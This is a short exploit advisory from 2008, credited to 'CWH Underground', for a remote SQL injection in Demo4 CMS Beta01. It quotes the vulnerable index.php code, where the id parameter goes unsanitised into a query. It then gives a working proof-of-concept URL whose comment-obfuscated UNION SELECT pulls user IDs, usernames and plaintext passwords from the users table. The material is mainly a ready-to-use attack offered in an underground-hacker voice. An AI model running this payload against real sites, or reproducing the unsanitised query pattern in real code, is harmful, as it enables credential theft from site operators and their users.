===============================================================
Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 23 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Demo4 CMS
VERSION : Beta01
VENDOR : N/A
DOWNLOAD : http://downloads.sourceforge.net/demo4
#####################################################
--- Remote SQL Injection ---
-----------------------------
Vulnerable File [index.php]
-----------------------------
@Line
8: if ($_GET['id']=="")
9: $id = $startpage;
10: else
11: $id = $_GET['id'];
12: database_connect();
13: $query = "SELECT * from content
14: WHERE id = $id";
15: $error = mysql_error();
---------
Exploit
---------
[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]
**This exploits can get username and password (No Encryption)**
-------------
POC Exploit
-------------
[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-23]